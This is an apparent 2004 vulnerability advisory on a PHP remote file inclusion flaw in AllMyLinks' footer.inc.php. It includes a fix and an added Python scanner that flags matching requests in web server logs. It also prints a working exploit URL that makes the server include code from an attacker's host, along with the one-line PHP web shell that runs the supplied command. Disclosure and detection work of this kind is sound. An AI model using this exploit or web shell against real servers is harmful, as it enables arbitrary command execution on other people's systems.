AllMyLinks PHP Code Injection vulnerability

2004-02-17T00:00:00
ID SECURITYVULNS:DOC:5776
Type securityvulns
Reporter Securityvulns
Modified 2004-02-17T00:00:00

Description

* AllMyLinks PHP Code Injection vulnerability *

Product : AllMyLinks
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No

**** Source ****

in /include/footer.inc.php


$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");


**** Exploit *******

http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

where http://[attacker]/include/template.inc.php contains:


<? system($cmd); ?>


**** Impact ****

A malicious user can execute arbitrary commands on the server.

**** Solution ******

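In /include/footer.inc.php, replace

$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

with

// Reject a request-supplied _AMLconfig (reachable when register_globals is on).
// Testing $_AMLconfig itself would also fire on the application's own configured value.
if (isset($_GET['_AMLconfig']) || isset($_POST['_AMLconfig']) || isset($_COOKIE['_AMLconfig'])) { die("Don't Hack it :)"); }

$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");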
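
For checking existing web server logs, the following added example (not part of the original advisory) flags requests with the shape shown in the Exploit section: a direct request to a .inc.php file combined with a parameter whose value is a remote URL. The log lines, the host remote.example and the script out.php are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2004:10:01:22 +0000] "GET /allmylinks/index.php?cat=3 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [14/Feb/2004:10:02:05 +0000] "GET /allmylinks/include/footer.inc.php'
    '?_AMLconfig[cfg_serverpath]=http://remote.example/&cmd=uname%20-a HTTP/1.0" 200 87',
    '192.0.2.78 - - [14/Feb/2004:10:02:40 +0000] "GET /allmylinks/include/footer.inc.php'
    '?_AMLconfig%5Bcfg_serverpath%5D=HTTP%3A%2F%2Fremote.example%2F HTTP/1.0" 200 0',
    '192.0.2.11 - - [14/Feb/2004:10:03:00 +0000] "GET /allmylinks/out.php?url=http://www.example.org/ HTTP/1.0" 302 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)  # URL schemes PHP can include from
INCLUDE_FILE_RE = re.compile(r'\.inc\.php$', re.I)

def classify(line):
    """Return (severity, reasons); severity is 'high', 'review' or 'none'."""
    m = REQUEST_RE.search(line)
    if not m:
        return ("none", [])
    url = urlsplit(m.group(1))
    reasons = []
    # Include files are meant to be pulled in by other scripts, not requested.
    direct = bool(INCLUDE_FILE_RE.search(url.path))
    if direct:
        reasons.append("direct request to " + url.path)
    # parse_qsl percent-decodes names and values, so encoded variants match too.
    remote = [n for n, v in parse_qsl(url.query, keep_blank_values=True)
              if REMOTE_URL_RE.match(v)]
    reasons += ["remote URL in parameter " + n for n in remote]
    if direct and remote:
        return ("high", reasons)
    # A single signal alone (e.g. a redirect script's url= parameter) needs a human look.
    return ("review" if reasons else "none", reasons)

def scan(lines):
    """Return (severity, line) pairs for every line that is not 'none'."""
    return [(sev, l) for l in lines for sev, _ in [classify(l)] if sev != "none"]

if __name__ == "__main__":
    for sev, line in scan(SAMPLE_LOG):
        print(sev.upper(), line)
```
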

**** Credits ****

bnfx : bnfx@antisocial.com

Mad_Skater : m4dsk4t3r@hotmail.com

TechTeam Brazilian Crew .